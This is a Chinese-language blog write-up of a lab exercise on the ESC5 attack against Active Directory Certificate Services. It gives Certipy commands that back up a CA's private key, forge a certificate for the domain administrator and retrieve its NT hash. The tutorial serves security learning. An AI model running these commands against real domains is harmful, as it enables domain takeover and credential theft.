摘要
继我早前写的ESC4文章之后——现在我的工作完成了,终于有更多时间学习,我想我也应该深入研究一下ESC5。说实话,我不知道为什么,但学习Active Directory攻击感觉起来要刺激得多,尽管在印度尼西亚的真实环境中它还相当少见。也许这只是我理想主义的一面在作祟,哈哈哈。好了,让我们一起开始学习吧。
什么是ESC5
ESC5是一种针对Active Directory证书服务(ADCS)的攻击。这种攻击利用了访问证书颁发机构(CA)的权限。如果攻击者获得了CA服务器上的本地管理员权限,他们就可以提取CA证书及其私钥。利用该私钥,攻击者可以为特权账户(如域管理员)伪造恶意证书。然后,这些伪造的证书可用于通过PKINIT向AD进行身份验证并请求TGT(票据授予票据)。
搭建实验环境
创建一个任意名称的账户,并将该账户添加为CA服务器(DC01)上的本地管理员:
net localgroup Administrators "igniteraj" /add
net localgroup Administrators
按回车键或点击查看完整大小的图片。
枚举与利用
在CA服务器上使用本地管理员账户通过Certipy枚举证书。 按回车键或点击查看完整大小的图片。 按回车键或点击查看完整大小的图片。
获取 0xc4t 的故事到你的收件箱。 免费加入Medium以获取此作者的更新。 订阅 订阅
使用Certipy备份CA证书和私钥。
certipy ca -backup -u alex.doe@sandbox.local -p "MyPassword123" -ca ignite-DC-CA -target 10.100.150.10
伪造我们想要接管的目标账户——在本例中为 administrator@sandbox.local,因为它是我目标上的域管理员。
certipy forge -ca-pfx 'sandbox-ca.pfx' -upn administrator@sandbox.local
使用Certipy获取 administrator@sandbox.local 账户的NT哈希。
certipy auth -pfx administrator_forged.pfx -dc-ip 10.100.150.10
按回车键或点击查看完整大小的图片。 按回车键或点击查看完整大小的图片。
使用SecretDump导出哈希凭证
按回车键或点击查看完整大小的图片。
参考资料
www.hackingarticles.in/ad-cs-esc5-… mayfly277.github.io/posts/ADCS-… www.vaadata.com/blog/ad-cs-… CSD0tFqvECLokhw9aBeRqixLzx0482UkkKWM4rJX2T+9qXDLcUYQal3W1ykfQ9si0pulG6s9/0h/hW8d28k1SsX8sObhJabP00Qx1uju62JSdqgDv8XWiIQ1stSnFOlB/q2Fi82D6F6LlOrFptzcOg==
